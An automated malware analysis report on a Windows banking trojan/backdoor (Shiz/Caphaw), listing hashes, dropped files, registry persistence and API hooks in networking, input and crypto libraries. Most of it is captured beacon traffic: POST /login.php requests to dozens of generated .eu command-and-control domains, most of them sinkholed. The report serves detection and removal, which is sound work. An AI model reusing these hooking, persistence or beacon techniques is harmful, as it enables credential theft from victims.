HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.71723 (B) (Emsisoft), Gen:Variant.Kazy.71723 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6d98ba6fe2c86b6e1e9092e7125f8b21
SHA1: d1adbe8019eefc298aaf44deee20d77abcaa6e94
SHA256: 2e850d8a37d6b0791c19f622dcbcc1267790999d2667340dd294d96114277e66
SSDeep: 3072:n/w6gCmvZZ1g9nTR61F/tNnr4U7BRScmJ8Re1YBRyD 4KABiQ3AwZI9tBkPL/Z27:/wVhk8cgSVLaGD8bQNZqU/Zq7Pmyjrx
Size: 260096 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Oracle Corporation
Created at: 1991-10-09 12:49:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:224
The Trojan injects its code into the following process(es):
Explorer.EXE:532
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\dbvpfca.exe (1801 bytes)
%System%\config\software (3115 bytes)
%System%\config\SOFTWARE.LOG (5787 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 3C E2 9F C1 9D 84 72 05 C9 1C D9 FD 54 D6 D7"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\esent.dll"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\dbvpfca.exe_, \??\%WinDir%\apppatch\dbvpfca.exe"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
"EventMessageFile" = "%System%\esent.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöFûe#µ¡X$YÉòd¼Œ¤Kô1,Å $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€ÂÂÂÂ\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂÂkDùâ€ÂÂaâ€ÂÂ*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÂÄZ¡r»ôâ€ÂÂ)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÂÃÂÂ=éÃâ€ÂÑщ¬q9|áÃÂÂù’‘ÃÂÂéšÄR"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\6d98ba6fe2c86b6e1e9092e7125f8b21\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\6d98ba6fe2c86b6e1e9092e7125f8b21\DEBUG]
"Trace Level"
Dropped PE files
MD5 | File path |
---|---|
6ac0f73e546e374dd98b682c4a62f1d8 | c:\WINDOWS\AppPatch\dbvpfca.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:224
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\dbvpfca.exe (1801 bytes)
%System%\config\software (3115 bytes)
%System%\config\SOFTWARE.LOG (5787 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Fallaciously
Product Name: Cunctatury
Product Version: 9.2.9.8
Legal Copyright: overwisdom
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 0.3.8.6
File Description: anoscope
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.YolX | 4096 | 28591 | 1536 | 0 | 53e979547d8c2ea86560ac45de08ae25 |
.text | 32768 | 17811 | 17920 | 4.63219 | 426f185540c0be2b362fec1782d1ea88 |
.UrnGiP | 53248 | 1070 | 1536 | 0 | 53e979547d8c2ea86560ac45de08ae25 |
.awBQJUL | 57344 | 1695 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
.slUCrgA | 61440 | 2023 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
.data | 65536 | 63123 | 7168 | 4.94757 | fcb579f5a65b5002e2052ddbe1f1c56a |
.GdUqi | 131072 | 2188 | 2560 | 3.74983 | 8d3efb48aaa62cbbd679fa6b4b3746be |
.rdata | 135168 | 212713 | 212992 | 5.54081 | 1498d94f261537a406a4eef10c2a9790 |
.fvTRZ | 348160 | 790 | 1024 | 0 | 0f343b0931126a20f133d67c2b018a3b |
.mHTN | 352256 | 396 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
.rsrc | 356352 | 5072 | 5120 | 3.04187 | 6ad2c3a4b1fa49bb9cc2a8424a19eb3f |
.GjQNcMz | 364544 | 266 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
.ZJhdvo | 368640 | 1232 | 1536 | 0 | 53e979547d8c2ea86560ac45de08ae25 |
.sIVhg | 372736 | 2338 | 2560 | 0 | a371492f16c0940507435909603efe88 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 19
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:26 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:45 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:39:05 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:18 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=02bb14d6e58270369a0be2635e2f3edd; Expires=Sun, 03 Sep 2023 05:30:42 GMT
Date: Sun, 04 Sep 2016 05:30:42 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2016 05:30:33 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:42 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
